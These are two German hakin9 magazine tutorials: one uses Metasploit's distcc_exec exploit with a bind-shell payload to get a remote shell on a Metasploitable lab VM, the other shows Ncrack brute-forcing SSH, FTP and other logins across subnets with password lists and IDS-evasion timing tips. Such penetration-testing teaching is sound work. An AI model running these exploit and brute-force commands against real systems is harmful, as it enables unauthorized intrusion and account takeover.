Source Pentesting-Tools, die es einem ermöglichen, eine breite Palette an Malware an einem zu kompromittieren-den Host auszuführen. Es ist Teil des Metasploit Projekts, sehr mächtig und vermag dem Benutzer einige Werkzeu-ge an die Hand zu geben, um sich damit in verschiedenen Netzen umzusehen. Dies wird allerdings manchmal sehr kontrovers diskutiert, da es somit auch die Möglichkeit mitbringt für unbedarfte User schnelle Ergebnisse in wo-möglich fremden Netzen zu erzielen. Aber gerade für die-jenigen Leute unter uns, zu deren täglichen Aufgaben es gehört, sicherheitsrelevante Netzwerkarchitekturen bzw. Segmente zu betreuen ist es sehr interessant dies mal aus einer anderen Perspektive zu sehen. Es ist vielleicht sogar unabdingbar sich als verantwortungsbewusster Ad-ministrator damit auseinanderzusetzen. Das MSF existiert für alle unixoiden Systeme und ist auch in der Windows-Welt dank Cygwin ausführbar. Es existieren drei verschie-dene Möglichkeiten um mit dem System zu interagieren, die msfconsole, msfcli und die msfgui. Wir werden uns auf die msfconsole beschränken sie ist -meiner Meinung nach- die komfortabelste unter allen drei Möglichkeiten. Der große Vorteil an Metasploit ist der modulare Aufbau, es besteht vereinfacht gesagt die Möglichkeit verschiede-ne Payloads über einen Exploit zu bedienen. Anders aus-gedrückt - jedes Modul der MSF-Datenbank ist für sich ei-genständig und hat keine Abhängigkeiten, wenn man mal von den internen Vorschlagslisten absieht.
VorbereitungenWir werden uns für diesen Fall ein Zielsystem suchen, welches sich innerhalb eines geschlossenen Versuchs-netzes befindet. Es ist hilfreich, wenn wir uns den dafür gedachten Metasploitable[2] Images bedienen. Es han-delt sich hier um ein vom Metasploit Projekt bereit gestell-
Abbildung 2. Metasploit Begrüßungsschirm
10/201034
TOOLS
den . Dafür wird der in Metasploit integrierte Portscan-ner bemüht.
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.178.1/24
Wir haben also eine IP-Adresse die wir für das weite-re Vorgehen nutzen können, außerdem sehen wir eini-ge offene TCP-Ports, die leicht als Einfallstor genutzt werden können (vgl. Listing 1.). Jetzt gilt es den richti-gen Schlüssel für eines davon zu finden. Wir nehmen uns den Port 3632 vor, der auch von dem DistCC-Ser-
vice genutzt wird. Dieser wird normalweise zur Vertei-lung von C/C++ Programmen in größeren Netzwerken und erspart einem so das zeitintensive lokale compilie-ren auf den jeweiligen Rechnern. Jetzt ist er aber auch nützlich für unseren Versuchsaufbau. Nun suchen wir mittels search distcc welche Exploits für diesen Service in dem Framework vorhanden sind (vgl. Listing 2.).
Mittels use unix/misc/distcc_exec wählt man das ent-sprechende Exploit aus.
Nun ist uns schon einiges über das zu kompromittie-rende System bekannt; IP-Adresse, auf welchen Port der Exploit abzielt und welcher Exploit es sein wird.
Listing 1. TCP Scan mittels auxiliary/scanner/portscan/tcp
[*] 192.168.178.100:22 - TCP OPEN
[*] 192.168.178.100:21 - TCP OPEN
[*] 192.168.178.100:23 - TCP OPEN
[*] 192.168.178.100:25 - TCP OPEN
[*] 192.168.178.100:53 - TCP OPEN
[*] 192.168.178.100:80 - TCP OPEN
[*] 192.168.178.100:139 - TCP OPEN
[*] 192.168.178.100:445 - TCP OPEN
[*] 192.168.178.100:3306 - TCP OPEN
[*] 192.168.178.100:3632 - TCP OPEN
[*] 192.168.178.100:5432 - TCP OPEN
[*] 192.168.178.100:8009 - TCP OPEN
[*] 192.168.178.100:8180 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Listing 2. Suche nach dem entsprechenden Expoit
msf > search distcc
[*] Searching loaded modules for pattern 'distcc'...
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
Listing 3. Anzeige der kompatiblen Payloads
msf exploit(distcc_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
Das Metasploit Framework als Unterstützung bei Penetrationstests
hakin9.org/de 35
Was noch fehlt ist der Payload, der auf den Exploit auf-setzt. Dies kann einfach über den Befehl show payloads ermittelt werden (vgl. Listing 3.).
Anschließend wird per set payload cmd/unix/bind_perl der erste Payload für den Exploit gesetzt.
Entsprechend wird auch der Port und die IP-Adresse des Ziels mittels set eingegeben. Der Befehl show options zeigt uns die Einstellmöglichkeiten an (vgl. Listing 4.).
Soweit sieht alles gut aus, wir können nun mit dem Aufruf des Exploits beginnen (vgl. Listing 5.).
Es wurde nun per remote Bind-Shell die Verbindung hergestellt, jetzt besteht die Möglichkeit weitere Root-Rechte zu erlangen. Auf dem Metasploitable Image be-findet sich eine Textdatei die verschiedene Schwach-stellen des Systems auflistet, hier kann man sich auch ein paar Anregungen holen.
ResumeeZusammenfassend lässt sich sagen, dass dieses Framework seit seinem Start im Jahr 2004 immer mehr Anhänger findet, was nicht zuletzt auch der of-fenen Struktur zuzuschreiben ist. Gerade auch Ein-steigern auf dem Gebiet bietet es viele Möglichkeiten ihr Wissen zu erweitern, die Lernkurve ist relativ steil. Diejenigen die von Berufswegen tagtäglich damit ar-beiten wissen es zu schätzen und es ist ganz bestimmt ein funktionales Werkzeug, wenn es darum geht sein eigenes System und dessen Schwachstellen kennen-zulernen. Dies wiederum macht sich zwar nicht sofort bezahlt, zahlt sich aber spätestens dann aus, wenn Not am Mann ist.
Listing 4. Setzen des Hosts und der Ports mittelst set
msf exploit(distcc_exec) > set RPORTS 3632
msf exploit(distcc_exec) > set
RHOST 192.168.178.100
msf exploit(distcc_exec) > show
options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.178.100 yes The target
address
RPORT 3632 yes The target port
Payload options (cmd/unix/bind_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.178.100 no The target
address
Exploit target:
Id Name
-- ----
0 Automatic Target
Listing 5. Ausführung des Exploits
msf exploit(distcc_exec) > exploit
[*] Started bind handler
[*] Command shell session 1 opened
(192.168.178.104:57052 ->
192.168.178.100:4444) at Wed Oct
27 00:12:13 +0200 2010
ls
4809.jsvc_up
whoami
daemon
Vorteile des Metasploit Frameworks • Sehr viele inkludierte Exploits und Payloads die auf ver-
schiedensten Betriebssystemen anwendbar sind.• Gute Anpassungsfähigkeit auf eigene Bedürfnisse (an-
passbare Exploits)• Plattformunabhängiges Tool, auch für Einsteiger geeignet• quelloffen• modularer Aufbau
Nachteile des Metasploit Frameworks • leider keine „All-in-One“ Lösung• für Sicherheitsexperten mit entsprechendem KnowHow
nur bedingt empfehlenswert, da nicht immer so aktuell & umfangreich wie kommerzielle Lösungen
• keine Zero-Day-Exploits
Im Internet• [1]http://www.metasploit.com/framework/ Metasploit Fra-
mework Seite• [2]http://www.metasploit.com/documents/express/Meta-
sploitable.zip.torrent/ - Der offizielle Metasploitable Tor-rent
ALEXANDER WINKLERDer Autor ist selbst als Administrator tätig und betreut die Umsetzung von IT-Sicherheitsrichtlinien in Unternehmen.Kontakt mit dem Autor unter: [email protected]
11/201036
TOOLS
Ncrack ist ein klassisches BruteForce Programm, es bietet auf einer modularen Basis verschie-dene Protokollimplementationen an. Es gibt
Module zur Authentifizierung für FTP, SSH, TELNET, HTTP(S), SMB, RDP und POP3(S). Es sind ebenfalls alle möglichen Optionen und Services als Module im Quellcode enthalten. Alle benötigten Informationen ge-nauso wie eine detailliertere Anleitung findet sich auf der NMap – Webseite. Es gibt verschiedene Tools wie Ncrack, z.B. THC-Hydra oder JTR, aber im wesentli-chen unterscheiden diese sich nicht wirklich.
Bei BruteForce-Angriffen sollte immer beachtet werden, dass die Fähigkeit das Password zu kna-cken davon abhängt wie gut die Passwortliste ist und in welcher Art und Weise eine Authentifizierung stattfindet. Ein Beispiel hierfür wird im Abschnitt des SSH-Moduls gegeben, da Ncrack hier einen anderen Algorithmus gegenüber anderen Mitspielern, imple-mentiert hat.
Wenn es darum geht mit BruteForce-Angriffen erfolg-reich die Widerstandsfähigkeit von Systemen überprü-fen zu wollen gilt es einige Dinge zu beachten. Wenn wir von BruteForce Angriffen sprechen, dann beschreiben wir eine Methode bei der eine Brechstange angesetzt wird oder wir versuchen mit dem Kopf durch die Wand zu gehen. Denn eines ist gewiss, die Angriffe erfordern meistens viel Zeit und erzeugen ein enorm hohes Auf-kommen an Netzwerkverkehr. Umso schwieriger wer-den die Angriffe, wenn bekannt ist, dass komplexe Passwörter eingesetzt werden.
Es gibt die Herausforderung, neben einer guten Passwort- und Namensliste ebenfalls über eine Über-sicht aller Hosts im Netzwerk und deren offenen Ports zu verfügen. Hierfür gibt es mehrere Programme, wie z.B. NMap, welches schon genannt worden ist und wohl auch der berühmteste Vertreter seiner Art ist. Mit solch einem Tool lässt sich schnell und gezielt ein gesamtes Netzwerk untersuchen. Außerdem wird die Ausgabe in verschiedenen Dateiformaten angeboten, so dass direkt mit dem erzielten Ergebnis weiter ge-arbeitet werden kann. Da Nmap und Ncrack sich un-mittelbar kombinieren lassen, wird in diesem Artikel speziell der Einsatz von Ncrack mit Hilfe von Nmap aufgezeigt.
In den folgenden Abschnitten werden einige Funktio-nen bzw. Optionen und Services des Programms erklärt. Unter anderem, wie und in welcher Art anzugreifende Ziele definiert werden können. Wie spezielle Spezifika-tionen für einen Dienst vorgegeben werden. Wie Zeit- und Performanceoptionen eingestellt werden und wie eine Authentifizierung durchgeführt werden kann. Da-neben bietet Ncrack die Möglichkeit die Ergebnisse in verschiedenster Art auszugeben, was ebenfalls in ei-nem gesondertem Abschnitt vorgestellt wird.
Im letztem Abschnitt werden dann noch mehrere Bei-spiele vorgestellt. Diese Beispiele, mit verschiedenen Spezifikationen und Nutzung verschiedener Module werden ausführlich erklärt. In diesem Abschnitt wird auch mittels Programm TCPDump veranschaulicht, dass mit einem BruteForce Angriff im Netzwerk sehr
Ncrack – Netzwerkauthentifizierungen knacken
Dieser Artikel beschreibt wie mit dem Tool Ncrack verschiedene Dienste im Netzwerk bzw. die Computer und andere Geräte im Netzwerk auf denen diese Dienste laufen auf schwache Passwörter überprüft werden können. Ncrack bedient sich dabei einem modularem Ansatz, für verschiedene Services.
IN DIESEM ARTIKEL ERFAHREN SIE...• wie Sie mit Hilfe von Ncrack BruteForce-Angriffe durchführen• wie Sie Einstellungen vornehmen um die BruteForce-Angriffe
WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...• einfach Kenntnisse eines Betriebssystems (Linux, Windows
oder Mac) • Vorkenntnisse Nmap bzw. Port Scanning Techniken• Grundkenntnisse im Netzwerk und der eingesetzten Dienste
Christian Stockhorst
Ncrack – Netzwerkauthentifizierungen knacken
hakin9.org/de 37
Ncrack OptionenIm folgendem Abschnitt werden alle Optionen und Ser-vicefunktionen von Ncrack vorgestellt. Es wird jedoch für diejenigen, welche sich schon ausführlicher mit NMap beschäftigt haben schnell klar das Ncrack sich sehr an seinem großem Projektbruder NMap anlehnt, was den Aufruf einiger Parameter angeht.
Zielspezifikation: Ncrack bietet mehrere Möglichkei-ten um Adressspezifikationen festzulegen, in diesem erstem Abschnitt werden mögliche Zieladressierungen vorgestellt.
Die einfachste Zielspezifikation die Ncrack anbietet, ist über den Hostnamen oder die IP-Adresse.
Als Beispiel, sei folgender Aufruf gegeben: ncrack 192.168.178.1 oder ncrack testsystem.local.
Es besteht die Möglichkeit Ncrack mehrere Zielspezi-fikationen mitzugeben, diese müssen noch nicht einmal vom selben Typ sein. So wäre folgender Aufruf denk-bar: ncrack ssh://192.168.178.1 localhost:22.
Auch ganze Netzwerkadressbereiche können über das aus der Linuxwelt bereits bekannte CIDR – Format angesprochen werden. Ein Aufruf sähe wie folgt aus: ncrack ssh://192.168.178.1/24
Ziele können dabei nicht nur, über die Kommando-zeile angegeben werden, sondern mit den folgenden
vorsichtig umgegangen werden muss, denn solch ein Angriff erzeugt eine Menge Netzwerkverkehr (Geräu-sche).
Installation von NcrackNcrack ist verfügbar für die Betriebssysteme(BS) Linux, BSD, Windows und MAC OS X. Eine Installation für die BS Windows und MAC OS X, ist wirklich sehr einfach da hierfür bereits ein Installationspaket vorhanden ist. Es gibt aber auch eine Quellcode-Variante, welche auf allen oben genannten System installiert und genutzt werden kann. Da Ncrack permanent weiterentwickelt wird, steht auch eine SVN – Version zur Verfügung, wel-che frei zugänglich ist.
Linux: Es wird lediglich die Installation von Ncrack auf einem Linuxsystem beschrieben, da die Installationen auf Mac OS X bzw. Windows mit ein bis zwei Maus-klicks erledigt ist. Aber auch die Installation unter Linux ist für jemanden mit ein wenig Erfahrung kein wirkliches Hindernis. Denn die Software mit folgenden Befehlen kompiliert und installiert werden.
Nachdem die Installation ausgeführt wurde kann das Programm mittels Befehl ncrack aufgerufen werden. Es folgt ein Bildschirm mit allen Einstellungs- und Service-optionen.
Listing 1. Installation unter Linux
//Folgende Befehle sind notwendig um die Software unter Linux zu installieren.
//Um die Datei zu entpacken
tar -xzf ncrack-0.3ALPHA.ta.gz
//Um ins entpackte Verzeichniss zu wechseln
cd ncrack-0.3ALPHA
//Um die Konfigurationsdatei zu erstellen, Verzeichnisse vorzubereiten und Dateien zu kopieren
./configure
//Durchführung der Übersetzung
make
//Benutzerwechsel, Installation nur als Root möglich
su root
//Installation des Programmes
make install
Listing 2. NMap Aufruf für XML Datei
/*Mit folgendem NMap-Befehl kann eine entsprechende XML – Datei erstellt werden , welche in Ncrack aufgerufen
werden kann*/
nmap 192.168.178.1 -oX test.xml
Listing 3. Ncrack Aufruf einer NMap-XML Datei
/*Mit folgendem Ncrack-Befehl kann eine entsprechende Nmap-XML Datei aufgerufen werden.*/
ncrack 192.168.178.1 -iX test.xml
11/201038
TOOLS
Schaltern auch über Dateien eingelesen werden, die zuvor z.B. mit NMap erstellt worden sind. In Listing 2 sehen sie daher, wie eine solche Nmap-XML Datei er-stellt werden kann, im Anschluss daran zeigt Listing 3 wie die erstellte Datei mit Ncrack aufgerufen werden kann.
Häufig ist es so, dass durch Nmap mehr Dienste auf dem Host erkannt werden, als eigentlich durch Ncrack unterstützt werden. Das hat zur Folge, das die nicht un-terstützte Dienste von Ncrack ignoriert werden (vgl. Ab-bildung 1.).
Dienstspezifikation:Um Ncrack nutzten zu können muss mindestens ein Ziel und ein entsprechender Dienst beim Aufruf ange-geben werden. Dabei kann die Dienstspezifikation über den entsprechenden Port oder den Namen des Diens-tes definiert werden. Eine Ausnahme bildet jedoch, ein Dienst der auf einem ihm fremden Port angesiedelt ist. Hier muss beim Aufruf, der Dienst und der Port angege-ben werden, siehe Beispiel.
Ncrack bietet für die oben genannten Möglichkeiten die Per-Host bzw. Global Spezifikation an.
Per-Host Dienstspezifikation: Spezifikationen die per-Host festgelegt werden sind direkt an diesen geschrie-ben und somit auch gebunden.
Beispiel: ncrack ssh://192.168.178.27 ftp://192.168. 178.27 192.168.178:21 192.168.178:22
Globale-Dienstspezifikation: Optionen in diesem Mo-dus beziehen sich auf alle Hosts, unabhängig davon auf welchen Dienst diese sich beziehen. Die globale Defi-nition wird mit dem Schalter -p aktiviert. So können mit-tels Kommatrennung pro Host oder Ziel mehrere Diens-te mit entsprechenden Ports festgelegt werden:
Beispiel: ncrack 192.168.178.27 -p 22,ftp:3300,telnet, pop:56
Im Normalfall reicht hier die Spezifikation des Ports oder des Dienstes, da Ncrack diesen zuordnen kann. Für entsprechend abweichende Dienste von Standard-ports, muss beides definiert werden, siehe im obigen Beispiel die Dienste ftp und pop.
Dienstoptionen: Dienstoptionen können genau wie die eben be-schrieben Dienstspezifikationen auf verschiedene Gruppen angewendet werden. Unter anderem auf
Abbildung 2. Erfolgreiche Authehtifizierung
Abbildung 1. Ncrack ignoriert unbekannte Dienste
Listing 4. Beispiel 1
/*Ein erstes einfaches Beispiel mit ssh*/
ncrack 192.168.178.27:22 - -user root,admin,administrator - -pass 123.Admin,passwort,PASSWORT,Passwort1+
/*Identisches Beispiel wie oben, mit anderer Dienstdefinition*/
ncrack ssh://192.168.178.27 - -user root,admin,administrator - -pass 123.Admin,passwort,PASSWORT,Passwort1+
Ncrack – Netzwerkauthentifizierungen knacken
hakin9.org/de 39
einen einzelnen Host, auf bestimmte Module bzw. Dienste, oder auf eine globale Definition. Durch Dienstoptionen werden dabei die Timing- und Per-formanceeinstellungen festgelegt, diese werden im folge Abschnitt besprochen. Die verschiedenen Optionen können in einer großen Vielfalt festgelegt werden, dabei gibt es jedoch eine strikte Hierarchie zu berücksichtigen.
Per-Host Optionen: Wie im vorherigem Abschnitt schon beschrieben, definieren auch hier die Per-Host Optionen spezielle Parameter für ein einzelnes Ziel.
Beispiel: ncrack ssh://192.168.178.27:22,cl=1,CL=2Per-Modul Optionen: Optionen die pro Modul festge-
legt werden beziehen sich auf, alle in einem Aufruf be-stehenden Instanzen dieses Moduls (Dienstes). Aufge-rufen wird die Optionen mit dem Parameter -m .
Beispiel: ncrack ssh://192.168.178.1/24 -m ssh: cl=1,CL=2,at=2,cd=300ms
Globale Optionen: Optionen die global festgelegt wer-den, gelten für alle Ziele und alle Dienste. Der Aufruf dieser Optionen wird mit dem Parameter -g initiiert.
Beispiel: ncrack 192.168.178.1/24:22 192.168.178. 1/24:80 -g cl=1,CL=3,at=2,cd=300 -m ssh:cl=1,CL=2
Zeit- und Performanceeinstellungen: Diese Grup-pe der Optionen ist die wichtigste die ein vernünftiges Netzwerk-Authentifizierungs Tool ausmachen. Um eine größtmögliche Präzision zu erhalten ohne das weiterer Benutzereingriffe notwendig sind, müssen diese Optio-nen viele Möglichkeiten mit diversen Einstellungen bie-ten.
Einige der kommenden Parameter akzeptieren ei-nen Zeitparameter. Dieser kann in Millisekunden, Se-kunden, Minuten und Stunden angeben werden. Im Ab-schnitt Beispiel wird solch ein Beispiel mit festgelegtem Zeitparameter vorgestellt.
Connection Limit: cl <num-minconnections>; CL <num-
maxconnections> Hiermit wird statisch festgelegt wie viele Verbindungen
gleichzeitig geöffnet werden. Denn normalerweise arbei-tet Ncrack dynamisch, dabei wird die Anzahl von Verbin-dungen für jedes anzugreifende Ziel anhand von verwor-fenen Paketen bzw. Verbindungsfehlern festgelegt.
Der Nutzen dieser Einstellung ist gerade dann gut geeignet wenn bekannt ist, dass die Ziele bei denen Authentifizierungsversuche durchgeführt werden kei-ne simultanen Verbindungen zulassen. Aber diese Pa-rameter sind auch mit Vorsicht zu gebrauchen, denn durch einen zu hohen Wert kann es passieren das Firewall- oder IDS-Systeme einen DoS Angriff dahinter vermuten und die entsprechende IP – Adresse aus dem Netz verbannen.
Auf der anderen Seite kann gerade durch den ge-schickten Nutzen einer Verbindungsobergrenze dafür gesorgt werden, dass der eigene Computer im Netz-werk möglichst unentdeckt bleibt, sich quasi unsichtbar im Netzwerk aufhält. Was aber wiederum einen enor-men Nachteil der Geschwindigkeit bei den Authentifizie-rungsversuchen nach sich zieht.
Authentication Tries: at <num-attempts>
Mit Hilfe dieses Parameters kann festgelegt werden, wie viele Authentifizierungs-Versuche pro Verbindung vorgenommen werden. Viele Dienste haben eine obe-re Grenze was die Anzahl der Versuche pro Verbin-dung angeht.
Wenn der Wert auf eine zu hohe Anzahl gesetzt wird, dann wird daraus kein wirklicher Mehrwert gezogen. Denn sobald Ncrack realisiert, dass die angegebene Zahl der Authentifizierungsversuche nicht erreicht wer-den kann, wird die übergebene Einstellung ignoriert.
Abbildung 4. Ncrack Netzwerkverkehr
Abbildung 3. Statusausgabe Ncrack
11/201040
TOOLS
Connection Delay: cd <time>
Einstellen einer Verzögerung zwischen den einzelnen Verbindungen eines Authentifizierungs-Versuches. Im Standard versucht Ncrack so schnell wie möglich neue Verbindungen zu initiieren, dies aber auch nur wenn kein Connection Limit eingestellt ist. Die Opti-on benötigt eine der oben bereits genannten Zeitpa-rameter.
Timeout: to <time>
Durch diese Option wird festgelegt wie viel Zeit Ncrack aufbringt um einen Dienst zu knacken. Danach stoppt das Programm, unabhängig davon ob es gültige An-meldedaten gefunden hat oder nicht.
Timing template: -T paranoid / sneaky / polite / normal
/ aggressive / insane
Diese Einstellungen, sind den Lesern die bereits Er-fahrung mit Nmap haben sehr wahrscheinlich bekannt. Es geht hier um Templates, welche ein Gesamtge-rüst aus den oben im einzelnen beschriebenen Para-metern bilden. Angefangen bei paranoid welches eine Vorlage darstellt mit wenigen Verbindungen und ho-hen Timeouts, bis hin zu insane welches ein Maximum an Verbindungen und ein Minimum an Timeouts reprä-sentiert.
Authentifizierung: In diesem Abschnitt werden die verschiedenen Para-meter beschrieben, die genutzt werden um Benutzer-namens- und Passwortlisten übergeben zu können.
• Hinweis: Ncrack liefert im Verzeichnis /usr/local/share/ncrack einige vordefinierte Listen für Pass-wörter und Benutzernamen.
• Benutzerliste-Datei: -U <Dateiname> • Passwortliste-Datei: -P <Dateiname> • Benutzernamen: - - user <username_liste> • Passwortliste: - - pass <passwort_liste>• Umkehren der Listeniteration: - - passwords-first
Ein Beispiel für den Aufruf solcher Listen befindet sich im Abschnitt Beispiele.
Ausgabe:Vieles was an Daten erzeugt wird, muss zu Zwecken der Dokumentation, oder alleine um eine vernünfti-ge Übersicht zu erhalten dementsprechend vom Pro-gramm ausgegeben oder dargestellt werden. An dieser Stelle, werden durch Ncrack mehrere Möglichkeiten ge-boten damit auch fast jeder Benutzer auf seine Kosten kommt.
Ncrack bietet drei verschiedene Ausgabemög-lichkeiten an. Das erste hier vorgestellte Ausgabe-format ist der interactive output, welcher über das Standardoutput(stdout) des Betriebssystems gesendet
Listing 5. Beispiel 2
/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten mit ftp und ssh*/
ncrack 192.168.178.1/24 -p ftp:21,ssh:22 - -user root,admin,administrator - -pass 123.Admin,passwort,PASSWORT,Pa
sswort1+
Listing 6. Beispiel 3
/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten und Passwortlisten*/
ncrack 192.168.178.1/24:22 192.168.178.1/24:80 –iX sample.xml -U usernames.txt -P passwortliste.txt
Listing 7. Beispiel 4
/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten, Passwortlisten und Moduloptionen*/
ncrack 192.168.178.1/24:22 192.168.178.1/24:80 -m ssh:cl=1,CL=2 –iX sample.xml -U usernames.txt -P
passwortliste.txt
Listing 8. Beispiel 5
/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten, Passwortlisten, Moduloptionen und globalen
Einstellungen*/
ncrack 192.168.178.1/24:22 192.168.178.1/24:80 -g cl=1,CL=3,at=2,cd=300 -m ssh:cl=1,CL=2 –iX sample.xml -U
usernames.txt -P passwortliste.txt
Ncrack – Netzwerkauthentifizierungen knacken
hakin9.org/de 41
wird. Daneben gibt es dann noch den normal output, welcher dem interactive output identisch ist. Die Unter-schiede zeigen sich in der Ausgabe von Laufzeitinfor-mationen und Warnungen.
Die dritte Ausgabemöglichkeit ist XML, was heutzu-tage eines der wichtigsten Ausgabetypen ist. Es kann sehr schnell in HTML konvertiert werden, um es gra-fisch anzeigen zu können. Auch ein Import in Datenban-ken kann durch dieses Format ohne größere Probleme bewerkstelligt werden.
Ausgabeformate: Die mögliche Ausgabe kann anhand dreier Parameter gestaltet werden, welche zwei ver-schiedene Dateitypen erzeugen. So kann entweder eine Textdatei oder eine Xml – Datei als Ausgabeformat ge-wählt werden. Der dritte Parameter erlaubt nur noch ei-ne Ausgabe beider Dateitypen. Die Möglichen Parame-ter sind: -oN<filespec> ; -oX<filespec> ; -oA<basename>. Verschiedenes (Miscellaneous Options): Hierunter fal-len einige wichtige und nicht so wichtige Optionen die in Ncrack eingeschaltet werden können. Drei Optionsmög-lichkeiten sollten an dieser Stelle jedoch erklärt werden, da diese die Arbeit mit Ncrack erleichtern können.
- -resume <file> : Mit dieser Option besteht die Mög-lichkeit eine zuvor durch den Benutzer abgebrochene Sitzung wieder aufzunehmen. Eine Datei welche aus einem Abbruch erzeugt wurde, befindet sich im Home-Verzeichniss des Benutzers unter .ncrack, die Datei weißt dabei das Format: restore.YY-MM-DD_hh-mm auf.
-6: Diese Option aktiviert IPv6, was zur Folge hat das anstelle von Hostnamen nun ausschließlich Ipv6-Adressen akzeptiert werden. Alles andere wie z.B. die Ausgabe bleibt jedoch gleich.
Ncrack ModuleFTP: FTP ist eines der schnellsten Module, Grund hier-für ist unter anderem der geringe Protokoll-Overhead. Außerdem erlauben die meisten FTP-Dienste 3 bis 6 gleichzeitige Verbindungen, mit dem Ergebnis eines fehlgeschlagenen Anmeldungsversuch. Ein bekanntes Beispiel hierfür, ist FileZilla bei dem die Verzögerung so groß ist, dass es praktisch einfacher ist, mehrere Ver-bindungen gleichzeitig zu öffnen mit jeweils einer Au-thentifikation.
TELNET: Telnet ist zwar schon seit längerem durch seinen Gegenspieler SSH ersetzt worden, jedoch fin-det es immer noch häufigen Einsatz im Bereich von Routern und Netzwerkdrucken welche einen Fernwar-tungszugang haben. Normalerweise ist deren Authen-tifizierung auch recht einfach zu knacken, da meistens Standardpasswörter benutzt werden welche der Öf-fentlichkeit bekannt sind. Einen erheblichen Nachteil hat TELNET an sich, die Authentifizierung, welche sehr langsam.
SSH: Um Bruteforce-Angriffe gegen SSH durchfüh-ren zu können sind einige Hürden und Herausforderun-
gen zu beachten. Daher geht Ncrack bei der Iteration von Passwort und Benutzerlisten bei SSH etwas anders vor als die meisten anderen Programme. Grund hier-für ist, dass SSH während einer bestehenden Verbin-dungsauthentifikation keine Änderung des Anmeldena-mens zulässt.
Ncrack nutzt einen speziellen Algorithmus, welcher den Anmeldenamen einer bestehenden Verbindung mit Passwörtern versorgt. Ncrack öffnet als eine Ver-bindung und übergibt soviele Passwörter an einen be-stimmten Anmeldenamen wie Versuche vom Server zu-gelassen werden.
HTTP(S): Im HTTP-Modul wird bis jetzt lediglich die BASIS - Authentifikation unterstützt. Ncrack's HTTP-Module versucht mit dem Keep-Alive Flag zu arbeiten. Denn dieses führt zu einer erhöten Geschwindigkeit weil dutzende von Versuchen pro Verbindung unternommen werden können. Das HTTP – Modul kann auch über SSL genutzt werden.
SMB: Das SMB – Modul arbeitet über Raw-TCP, Net-BIOS ist zum jetzigem Standpunkt noch nicht imple-mentiert. Einen Vorteil, den dieses Protokoll bietet ist die hohe Parallelisierung, so dass Benutzer die Anzahl an gleichzeitigen Proben gegenüber SMB hoch halten können.
RDP: Ist ein von Microsoft entwickeltest Protokoll zur Übertragung von grafischen Terminalsessions vom Re-mote-Computer zum Client.
RDP ist eines der Protokolle welche den komplexes-ten Aufbau hat, es wird ein Austausch vieler Pakete für die Authehtifizierungsphase vorausgesetzt. Daher ist dieses Modul auch das langsamste aller hier vorgestell-ten Module, dementsprechend benötigt das knacken von Passwörtern viel Zeit.
Vorsicht: Sobald es sich um einen RDP Server auf Basis von Windows XP handelt, ist vorsichtig damit um-zugehen. Denn diese können nicht mehrere Verbindun-gen zur selben Zeit aushandeln. Daher ist es ratsam ein sehr langsames timing template oder noch besser die maximale Anzahl an parallelen Verbindungen zu be-schränken, mit der timing option CL (Connection Limit) oder cd (connection delay).
POP3(S): Leider lässt sich zu diesem Modul noch nicht so viel sagen, da es noch in einer experimentalen Phase ist. Jedoch kann es schon vollständig, wie die anderen Module auch, eingesetzt werden.
Ncrack BeispielIn den unten aufgezeigten Beispielen, werden alle Auf-rufe in einer virtuellen Netzwerkumgebung aufgerufen. Dabei ist stets der virtuelle Client mit der Ip-Adresse 192.168.178.27 das Angriffsziel. Hierbei handelt es sich um das Betriebssystem Debian 5.0 mit einem installier-ten OpenSSH-Server.
In dieser Testumgebung wird stets zu Demonstrati-onszwecken der Benutzer: root mit dem Passwort: 123.
11/201042
TOOLS
Admin verwendet. Da es sich hierbei um einen Account handelt der in allen vorgestellten Diensten Verwendung findet. Eine erfolgreich durchgeführte Authentifizierung erscheint wie in Abbildung 2 dargestellt.
Beide oben aufgeführten Befehle bewirken den glei-chen Vorgang, jeweils in einer anderen Schreibweise.
In Abbildung 4 ist dargestellt welcher Netzwerkver-kehr bei einer Authetifizierung, hier gegen SSH, auf-kommt.
Interaktionen zur Laufzeit Während der Ncrack Ausführung, ist eine Interaktion mit dem Programm möglich. Denn alle Tasten die gedrückt werden, werden vom Programm abgefangen umso mit diesem zu interagieren ohne es abbrechen oder neu-starten zu müssen. Dabei können folgenden Buchsta-ben verwendet werden,ein kleiner Buchstabe bedeutet dann die Ausgabe des Programms zu steigern und vice versa.
• v / V – erhöhen oder senken des verbosity Levels• d / D – erhöhen des debugging Levels • ? - Ausgabe eines Interaktionshilfe-Bildschirms
Jeder andere Taste – Ausgabe einer Statusmeldung (vgl. Abbildung 3. )
Best Practices Wie bereits weiter oben erwähnt ist ein BruteForce – Angriff immer ein Versuch ein System mit der Brech-stange zu knacken. BruteForce bedeutet also eine Gradwanderung, möglichst viele Versuche innerhalb kürzester Zeit was Authentifizierung angeht dabei aber möglichst unsichtbar für die Systeme bleiben die atta-ckiert werden.
Im voraus, sollten Informationen bzgl. der Netzwer-kinfrastruktur bzw. der dort angesiedelten Dienste vor-genommen werden. Hierzu gibt es Tools wie Nmap die sich in diesem Bereich bereits bewährt haben. Wenn bekannt ist, dass bestimmte Sicherheitssysteme wie
